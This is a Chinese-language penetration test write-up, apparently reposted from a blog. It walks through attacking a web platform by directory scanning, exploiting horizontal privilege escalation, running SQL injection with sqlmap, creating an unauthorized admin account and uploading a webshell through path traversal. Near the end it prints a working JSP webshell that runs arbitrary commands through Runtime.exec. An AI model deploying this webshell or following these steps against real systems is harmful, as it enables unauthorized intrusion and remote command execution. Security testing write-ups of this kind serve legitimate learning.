目標

• 某平臺系統(www.target.net)

流程

本次滲透測試的流程圖：

【技術資料】

測試

拿到站點后先做信息收集，掃描目錄看看有無敏感信息

寥寥無幾，沒有任何信息，啟動burpsuite打開網站走一遍流程。

在創建目標處存在圖片上傳接口，上傳shell試試。

沒有任何過濾，可直接上傳，但當前目錄不解析，猜測projectKey控制上傳路徑

可跨目錄上傳，但當前/webapp/test/uploadFile/路徑非網站根目錄，爆破了常見網站目錄但沒有一個是正確的解析shell的，先放著后續是否能找到網站根路徑然后再跨目錄上傳。

越權

在瀏覽到某個頁面中看到了一處鏈接/detail.shtml?key={{id}}，拿出來瀏覽器中訪問，測測是否存在越權或者SQL注入。

隨便給個數值訪問測試，發現只存在水平越權，不存在注入。

去掉參數直接訪問，卻彈出來了報錯頁面。

該站點使用的是spring框架，重新使用spring相關接口路由字典掃一遍，還意外掃到了druid登錄頁面，但并不存在未授權訪問和弱口令的漏洞，繼續看swagger。

在swagger中找到了一處注入和敏感信息泄露。

敏感信息泄露

根據URL猜參數名teamId，查看到所有的團隊信息。

這里也是一處越權。

sql注入

同樣猜參數名，未做任何過濾，單引號報錯，直接上sqlmap一把梭。

越權添加用戶

但翻了翻數據庫并未找到管理員賬號密碼，不過找到了網站接口配置信息，將接口導出然后放到burpsuite里面跑

成功找到了越權添加/編輯用戶接口，直接添加新管理員賬號并登錄。

任意文件上傳

回到剛才文件上傳處，通過sql注入報錯頁面我們找到了真實路徑/usr/local/test/webapps/ROOT/WEB-INF/classes/mappings/base-mapper.xml]，修改projectKey值，用…/…/…/…/跨目錄上傳shell

疑問

在最后上傳shell處，嘗試了冰蝎、哥斯拉的馬都無法正常解析，后來更換了帶密碼回顯的jsp馬才成功，請問這是什么原因？

<%if("admin".equals(request.getParameter("pwd"))){java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.println(new String(b));}out.print("</pre>");} %>

最后

點擊獲取【網絡安全學習資料·攻略】

總結

以上是生活随笔為你收集整理的某平台的一次简单渗透测试记录的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。